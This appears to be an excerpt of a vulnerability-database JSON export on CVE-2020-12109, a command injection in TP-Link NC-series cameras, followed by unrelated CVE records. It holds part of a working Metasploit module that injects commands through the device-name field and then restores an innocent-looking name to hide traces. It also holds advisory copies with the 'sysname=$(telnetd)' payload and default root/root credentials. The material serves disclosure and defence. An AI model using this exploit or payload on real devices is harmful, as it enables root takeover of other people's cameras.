Wrong target ip?') \nend \nif res.body =~ /\\\"errorCode\\\"\\:0/ && res.headers.key?('Set-Cookie') && res.body =~ /token/ \nprint_good(\"Logged-in as #{user}\") \n@cookie = res.get_cookies.scan(/\\s?([^, ;]+?)=([^, ;]*?)[;,]/)[0][1] \nprint_good(\"Got cookie: #{@cookie}\") \n@token = res.body.scan(/\"(token)\":\"([^,\"]*)\"/)[0][1] \nprint_good(\"Got token: #{@token}\") \nelse \nfail_with(Failure::NoAccess, \"Login failed with #{user}:#{pass}\") \nend \nrescue ::Rex::ConnectionError \nfail_with(Failure::Unreachable, 'Connection failed') \nend \nend \n \ndef enable_bonjour \nres = send_request_cgi({ \n'uri' => '/setbonjoursetting.fcgi', \n'method' => 'POST', \n'encode_params' => false, \n'cookie' => \"sess=#{@cookie}\", \n'vars_post' => { \n'bonjourState' => '1', \n'token' => @token.to_s \n} \n}) \nreturn res \nrescue ::Rex::ConnectionError \nvprint_error(\"Failed connection to the web server at #{rhost}:#{rport}\") \nreturn nil \nend \n \ndef sys_name(cmd) \nres = send_request_cgi({ \n'uri' => '/setsysname.fcgi', \n'method' => 'POST', \n'encode_params' => true, \n'cookie' => \"sess=#{@cookie}\", \n'vars_post' => { \n'sysname' => cmd, \n'token' => @token.to_s \n} \n}) \nreturn res \nrescue ::Rex::ConnectionError \nvprint_error(\"Failed connection to the web server at #{rhost}:#{rport}\") \nreturn nil \nend \n \ndef execute_command(cmd, _opts = {}) \nprint_status(\"Executing command: #{cmd}\") \nsys_name(\"$(#{cmd})\") \nend \n \ndef exploit \nlogin # Get cookie and csrf token \nenable_bonjour # Enable bonjour service \nexecute_cmdstager # Upload and execute payload \nsys_name('NC200') # Set back an innocent-looking device name \nend \n \nend \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/159222/tp_link_ncxxx_bonjour_command_injection.rb.txt"}, {"lastseen": "2020-08-31T07:08:58", "description": "", "published": "2020-05-01T00:00:00", "type": "packetstorm", "title": "TP-LINK Cloud 
Cameras NCXXX Bonjour Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-12109"], "modified": "2020-05-01T00:00:00", "id": "PACKETSTORM:157531", "href": "https://packetstormsecurity.com/files/157531/TP-LINK-Cloud-Cameras-NCXXX-Bonjour-Command-Injection.html", "sourceData": "`Vulnerability title: TP-LINK Cloud Cameras NCXXX Bonjour Command Injection \nAuthor: Pietro Oliva \nCVE: CVE-2020-12109 \nVendor: TP-LINK \nProduct: NC200, NC210, NC220, NC230, NC250, NC260, NC450 \nAffected version: NC200 <= 2.1.9 build 200225, NC210 <= 1.0.9 build 200304, \nNC220 <= 1.3.0 build 200304, NC230 <= 1.3.0 build 200304, \nNC250 <= 1.3.0 build 200304, NC260 <= 1.5.2 build 200304, \nNC450 <= 1.5.3 build 200304. \n \nFixed version: NC200 <= 2.1.10 build 200401, NC210 <= 1.0.10 build 200401, \nNC220 <= 1.3.1 build 200401, NC230 <= 1.3.1 build 200401, \nNC250 <= 1.3.1 build 200401, NC260 <= 1.5.3 build_200401, \nNC450 <= 1.5.4 build 200401 \n \nDescription: \nThe issue is located in the swSystemSetProductAliasCheck method of the \nipcamera binary (Called when setting a new alias for the device via \n/setsysname.fcgi), where despite a check on the name length, no other checks \nare in place in order to prevent shell metacharacters from being introduced. \nThe system name would then be used in swBonjourStartHTTP as part of a shell \ncommand where arbitrary commands could be injected and executed as root. \n \nImpact: \nAttackers could exploit this vulnerability to remotely execute commands as root \non affected devices. 
\n \nExploitation: \nAn attacker would first need to authenticate to the web interface and make a \nrequest such as the following (the request contents might change slightly \nbetween cameras): \n \nPOST /setsysname.fcgi HTTP/1.1 \nHost: x.x.x.x \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 \nContent-Type: application/x-www-form-urlencoded \nCookie: sess=xxxxx \nContent-Length: xxxx \n \nsysname=$(telnetd)&token=xxxxx\" \n \nIn a device where telnetd has not been removed from the release firmware (such \nas NC200), this would spawn the telnetd daemon. Default root/root credentials \ncould then be used to obtain a root shell via telnet. \n \nEvidence: \nThe disassembly of affected code from an NC200 camera is shown below: \n \nsym.swSystemSetProductAliasCheck: \n \n0x0049f1cc lui gp, 0xa \n0x0049f1d0 addiu gp, gp, -0x3ebc \n0x0049f1d4 addu gp, gp, t9 \n0x0049f1d8 addiu sp, sp, -0x28 \n0x0049f1dc sw ra, (var_24h) \n0x0049f1e0 sw fp, (var_20h) \n0x0049f1e4 move fp, sp \n0x0049f1e8 sw gp, (var_10h) \n0x0049f1ec sw a0, (alias_arg) \n0x0049f1f0 lw v0, (alias_arg) \n0x0049f1f4 nop \n,=< 0x0049f1f8 beqz v0, 0x49f218 \n| 0x0049f1fc nop \n| 0x0049f200 lw v0, (alias_arg) \n| 0x0049f204 nop \n| 0x0049f208 lb v0, (v0) \n| 0x0049f20c nop \n,==< 0x0049f210 bnez v0, 0x49f224 \n|| 0x0049f214 nop \n|`-> 0x0049f218 addiu v0, zero, 0x42f \n|,=< 0x0049f21c b 0x49f258 \n|| 0x0049f220 sw v0, (arg_18h) \n`--> 0x0049f224 lw a0, (alias_arg) \n| 0x0049f228 lw t9, -sym.imp.strlen(gp) \n| 0x0049f22c nop \n| 0x0049f230 jalr t9 \n| 0x0049f234 nop \n| 0x0049f238 lw gp, (arg_10h) \n| 0x0049f23c sltiu v0, v0, 0x81 \n,==< 0x0049f240 bnez v0, 0x49f254 \n|| 0x0049f244 nop \n|| 0x0049f248 addiu v0, zero, 0x430 \n,===< 0x0049f24c b 0x49f258 \n||| 0x0049f250 sw v0, (arg_18h) \n|`--> 0x0049f254 sw zero, (arg_18h) \n`-`-> 0x0049f258 lw v0, (arg_18h) \n0x0049f25c move sp, fp \n0x0049f260 lw ra, (var_24h) \n0x0049f264 lw fp, (var_20h) \n0x0049f268 jr ra \n0x0049f26c addiu 
sp, sp, 0x28 \n \nswBonjourStartHTTP: \n \n0x0043a008 addiu v0, fp, 0x20 \n0x0043a00c move a0, v0 \n0x0043a010 addiu a1, zero, 0x88 \n0x0043a014 lw t9, -sym.swBonjourGetName(gp) ; <= get the system name in fp+20 \n0x0043a018 nop \n0x0043a01c jalr t9 \n0x0043a020 nop \n0x0043a024 lw gp, (arg_10h) \n0x0043a028 addiu v0, fp, 0x20 ; <= put ptr to name in v0 \n0x0043a02c lw a0, -0x7fdc(gp) \n0x0043a030 nop \n0x0043a034 addiu a0, a0, 0xd10 \n; a0 => \"mDNSResponderPosix -n \\\"%s\\\" -t _http._tcp -p %d -x path=/login.html &\" \n0x0043a038 move a1, v0 ; <= a1 points to system name \n0x0043a03c lw a2, (arg_b0h) \n0x0043a040 lw t9, -sym.cmCommand(gp) ; Execute the command \n0x0043a044 nop \n0x0043a048 jalr t9 \n0x0043a04c nop \n \n \nMitigating factors: \n-NC210 Cameras have a filter for \"bad chars\". This means the payload cannot \ncontain any of the following characters: dot(.), at(@), dash(-), underscore(_), \nwhitespace( ), and single quote('). \n-Some cameras do not ship with telnetd, so other methods such as using wget or \ncurl to download a payload from the network might be required to obtain a shell. \n \nRemediation: \nInstall firmware updates provided by the vendor to fix the vulnerability. \nThe latest updates can be found at the following URLs: \n \nhttps://www.tp-link.com/en/support/download/nc200/#Firmware \nhttps://www.tp-link.com/en/support/download/nc210/#Firmware \nhttps://www.tp-link.com/en/support/download/nc220/#Firmware \nhttps://www.tp-link.com/en/support/download/nc230/#Firmware \nhttps://www.tp-link.com/en/support/download/nc250/#Firmware \nhttps://www.tp-link.com/en/support/download/nc260/#Firmware \nhttps://www.tp-link.com/en/support/download/nc450/#Firmware \n \nDisclosure timeline: \n29th March 2020 - Vulnerability reported to vendor. \n10th April 2020 - Patched firmware provided by vendor for verification. \n10th April 2020 - Confirmed the vulnerability was fixed. \n29th April 2020 - Firmware updates released to the public. 
\n29th April 2020 - Vulnerability details are made public. \n \n \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/157531/tplinkncxxbonjour-inject.txt"}], "zdt": [{"lastseen": "2020-07-19T18:00:24", "description": "TP-LINK Cloud Cameras including products NC200, NC210, NC220, NC230, NC250, NC260, and NC450 suffer from a command injection vulnerability. The issue is located in the swSystemSetProductAliasCheck method of the ipcamera binary (Called when setting a new alias for the device via /setsysname.fcgi), where despite a check on the name length, no other checks are in place in order to prevent shell metacharacters from being introduced. The system name would then be used in swBonjourStartHTTP as part of a shell command where arbitrary commands could be injected and executed as root.", "edition": 1, "published": "2020-05-06T00:00:00", "title": "TP-LINK Cloud Cameras NCXXX Bonjour Command Injection Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-12109"], "modified": "2020-05-06T00:00:00", "id": "1337DAY-ID-34369", "href": "https://0day.today/exploit/description/34369", "sourceData": "Vulnerability title: TP-LINK Cloud Cameras NCXXX Bonjour Command Injection\r\nAuthor: Pietro Oliva\r\nCVE: CVE-2020-12109\r\nVendor: TP-LINK\r\nProduct: NC200, NC210, NC220, NC230, NC250, NC260, NC450\r\nAffected version: NC200 <= 2.1.9 build 200225, NC210 <= 1.0.9 build 200304,\r\n NC220 <= 1.3.0 build 200304, NC230 <= 1.3.0 build 200304,\r\n NC250 <= 1.3.0 build 200304, NC260 <= 1.5.2 build 200304,\r\n NC450 <= 1.5.3 build 200304.\r\n\r\nFixed version: NC200 <= 2.1.10 build 200401, NC210 <= 1.0.10 build 200401,\r\n NC220 <= 1.3.1 build 200401, NC230 <= 1.3.1 build 200401,\r\n NC250 <= 1.3.1 build 200401, NC260 <= 1.5.3 build_200401,\r\n NC450 <= 1.5.4 build 200401\r\n\r\nDescription:\r\nThe issue is located in the swSystemSetProductAliasCheck method of 
the\r\nipcamera binary (Called when setting a new alias for the device via\r\n/setsysname.fcgi), where despite a check on the name length, no other checks\r\nare in place in order to prevent shell metacharacters from being introduced.\r\nThe system name would then be used in swBonjourStartHTTP as part of a shell\r\ncommand where arbitrary commands could be injected and executed as root.\r\n\r\nImpact:\r\nAttackers could exploit this vulnerability to remotely execute commands as root\r\non affected devices.\r\n\r\nExploitation:\r\nAn attacker would first need to authenticate to the web interface and make a\r\nrequest such as the following (the request contents might change slightly\r\nbetween cameras):\r\n\r\nPOST /setsysname.fcgi HTTP/1.1\r\nHost: x.x.x.x\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\nContent-Type: application/x-www-form-urlencoded\r\nCookie: sess=xxxxx\r\nContent-Length: xxxx\r\n\r\nsysname=$(telnetd)&token=xxxxx\"\r\n\r\nIn a device where telnetd has not been removed from the release firmware (such\r\nas NC200), this would spawn the telnetd daemon. 
Default root/root credentials\r\ncould then be used to obtain a root shell via telnet.\r\n\r\nEvidence:\r\nThe disassembly of affected code from an NC200 camera is shown below:\r\n\r\nsym.swSystemSetProductAliasCheck:\r\n\r\n 0x0049f1cc lui gp, 0xa\r\n 0x0049f1d0 addiu gp, gp, -0x3ebc\r\n 0x0049f1d4 addu gp, gp, t9\r\n 0x0049f1d8 addiu sp, sp, -0x28\r\n 0x0049f1dc sw ra, (var_24h)\r\n 0x0049f1e0 sw fp, (var_20h)\r\n 0x0049f1e4 move fp, sp\r\n 0x0049f1e8 sw gp, (var_10h)\r\n 0x0049f1ec sw a0, (alias_arg)\r\n 0x0049f1f0 lw v0, (alias_arg)\r\n 0x0049f1f4 nop\r\n ,=< 0x0049f1f8 beqz v0, 0x49f218\r\n | 0x0049f1fc nop\r\n | 0x0049f200 lw v0, (alias_arg)\r\n | 0x0049f204 nop\r\n | 0x0049f208 lb v0, (v0)\r\n | 0x0049f20c nop\r\n ,==< 0x0049f210 bnez v0, 0x49f224\r\n || 0x0049f214 nop\r\n |`-> 0x0049f218 addiu v0, zero, 0x42f\r\n |,=< 0x0049f21c b 0x49f258\r\n || 0x0049f220 sw v0, (arg_18h)\r\n `--> 0x0049f224 lw a0, (alias_arg)\r\n | 0x0049f228 lw t9, -sym.imp.strlen(gp)\r\n | 0x0049f22c nop\r\n | 0x0049f230 jalr t9\r\n | 0x0049f234 nop\r\n | 0x0049f238 lw gp, (arg_10h)\r\n | 0x0049f23c sltiu v0, v0, 0x81\r\n ,==< 0x0049f240 bnez v0, 0x49f254\r\n || 0x0049f244 nop\r\n || 0x0049f248 addiu v0, zero, 0x430\r\n,===< 0x0049f24c b 0x49f258\r\n||| 0x0049f250 sw v0, (arg_18h)\r\n|`--> 0x0049f254 sw zero, (arg_18h)\r\n`-`-> 0x0049f258 lw v0, (arg_18h)\r\n 0x0049f25c move sp, fp\r\n 0x0049f260 lw ra, (var_24h)\r\n 0x0049f264 lw fp, (var_20h)\r\n 0x0049f268 jr ra\r\n 0x0049f26c addiu sp, sp, 0x28\r\n\r\nswBonjourStartHTTP:\r\n\r\n0x0043a008 addiu v0, fp, 0x20\r\n0x0043a00c move a0, v0\r\n0x0043a010 addiu a1, zero, 0x88\r\n0x0043a014 lw t9, -sym.swBonjourGetName(gp) ; <= get the system name in fp+20\r\n0x0043a018 nop\r\n0x0043a01c jalr t9\r\n0x0043a020 nop\r\n0x0043a024 lw gp, (arg_10h)\r\n0x0043a028 addiu v0, fp, 0x20 ; <= put ptr to name in v0\r\n0x0043a02c lw a0, -0x7fdc(gp)\r\n0x0043a030 nop\r\n0x0043a034 addiu a0, a0, 0xd10\r\n; a0 => \"mDNSResponderPosix -n \\\"%s\\\" -t 
_http._tcp -p %d -x path=/login.html &\"\r\n0x0043a038 move a1, v0 ; <= a1 points to system name\r\n0x0043a03c lw a2, (arg_b0h)\r\n0x0043a040 lw t9, -sym.cmCommand(gp) ; Execute the command\r\n0x0043a044 nop\r\n0x0043a048 jalr t9\r\n0x0043a04c nop\r\n\r\n\r\nMitigating factors:\r\n-NC210 Cameras have a filter for \"bad chars\". This means the payload cannot\r\ncontain any of the following characters: dot(.), at(@), dash(-), underscore(_),\r\nwhitespace( ), and single quote(').\r\n-Some cameras do not ship with telnetd, so other methods such as using wget or\r\ncurl to download a payload from the network might be required to obtain a shell.\r\n\r\nRemediation:\r\nInstall firmware updates provided by the vendor to fix the vulnerability.\r\nThe latest updates can be found at the following URLs:\r\n\r\nhttps://www.tp-link.com/en/support/download/nc200/#Firmware\r\nhttps://www.tp-link.com/en/support/download/nc210/#Firmware\r\nhttps://www.tp-link.com/en/support/download/nc220/#Firmware\r\nhttps://www.tp-link.com/en/support/download/nc230/#Firmware\r\nhttps://www.tp-link.com/en/support/download/nc250/#Firmware\r\nhttps://www.tp-link.com/en/support/download/nc260/#Firmware\r\nhttps://www.tp-link.com/en/support/download/nc450/#Firmware\r\n\r\nDisclosure timeline:\r\n29th March 2020 - Vulnerability reported to vendor.\r\n10th April 2020 - Patched firmware provided by vendor for verification.\r\n10th April 2020 - Confirmed the vulnerability was fixed.\r\n29th April 2020 - Firmware updates released to the public.\r\n29th April 2020 - Vulnerability details are made public.\n\n# 0day.today [2020-07-19] #", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34369"}], "cve": [{"lastseen": "2020-10-03T12:55:48", "description": "Certain TP-Link devices allow Command Injection. 
This affects NC200 2.1.9 build 200225, NC210 1.0.9 build 200304, NC220 1.3.0 build 200304, NC230 1.3.0 build 200304, NC250 1.3.0 build 200304, NC260 1.5.2 build 200304, and NC450 1.5.3 build 200304.", "edition": 4, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-04T16:15:00", "title": "CVE-2020-12109", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-12109"], "modified": "2020-09-18T19:15:00", "cpe": ["cpe:/o:tp-link:nc210_firmware:1.0.4", "cpe:/o:tp-link:nc250_firmware:1.2.1", "cpe:/o:tp-link:nc260_firmware:1.5.2", "cpe:/o:tp-link:nc220_firmware:1.2.0", "cpe:/o:tp-link:nc450_firmware:1.3.4", "cpe:/o:tp-link:nc260_firmware:1.5.0", "cpe:/o:tp-link:nc250_firmware:1.0.8", "cpe:/o:tp-link:nc450_firmware:1.5.3", "cpe:/o:tp-link:nc200_firmware:2.1.6", "cpe:/o:tp-link:nc200_firmware:2.1.9", "cpe:/o:tp-link:nc230_firmware:1.3.0", "cpe:/o:tp-link:nc210_firmware:1.0.9", "cpe:/o:tp-link:nc250_firmware:1.0.10", "cpe:/o:tp-link:nc220_firmware:1.3.0", "cpe:/o:tp-link:nc260_firmware:1.0.6", "cpe:/o:tp-link:nc260_firmware:1.0.5", "cpe:/o:tp-link:nc250_firmware:1.3.0", 
"cpe:/o:tp-link:nc450_firmware:1.0.15", "cpe:/o:tp-link:nc230_firmware:1.0.3", "cpe:/o:tp-link:nc230_firmware:1.2.1", "cpe:/o:tp-link:nc450_firmware:1.1.2", "cpe:/o:tp-link:nc210_firmware:1.0.3", "cpe:/o:tp-link:nc260_firmware:1.4.1"], "id": "CVE-2020-12109", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-12109", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:tp-link:nc220_firmware:1.2.0:170516:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc230_firmware:1.2.1:170515:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc220_firmware:1.3.0:180105:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc260_firmware:1.0.5:160804:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc200_firmware:2.1.9:200225:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc250_firmware:1.0.10:160321:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc210_firmware:1.0.3:160229:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc260_firmware:1.5.2:200304:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc250_firmware:1.2.1:170515:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc260_firmware:1.5.0:181123:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc230_firmware:1.3.0:200304:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc200_firmware:2.1.6:160108_b:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc210_firmware:1.0.9:200304:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc250_firmware:1.0.8:160108:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc450_firmware:1.5.3:200304:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc450_firmware:1.1.2:161013:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc220_firmware:1.3.0:200304:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc260_firmware:1.0.6:161114:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc260_firmware:1.4.1:180720:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc450_firmware:1.3.4:171130:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc210_firmware:1.0.4:160412:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc230_firmware:1.0.3:160108:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc450_firmware:1.0.15:160920:*:*:*:*:*:*", "cpe:2.3:o:tp-link:nc250_firmware:1.3.0:200304:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:01:15", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote 
attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:28", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 7, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", 
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T19:28:28", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 
false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T21:41:41", "description": "A Denial Of Service vulnerability in MiniUPnP MiniUPnPd through 2.1 exists due to a NULL pointer dereference in GetOutboundPinholeTimeout in upnpsoap.c for rem_port.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-05-15T23:29:00", "title": "CVE-2019-12109", "type": "cve", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12109"], "modified": "2020-09-28T20:15:00", "cpe": ["cpe:/a:miniupnp_project:miniupnpd:2.1"], "id": 
"CVE-2019-12109", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12109", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:miniupnp_project:miniupnpd:2.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:10", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T20:25:46", "description": "The default configuration in Apache Cassandra 3.8 through 3.11.1 binds an unauthenticated JMX/RMI interface to all network interfaces, which allows remote attackers to execute arbitrary Java code via an RMI request. This issue is a regression of CVE-2015-0225. 
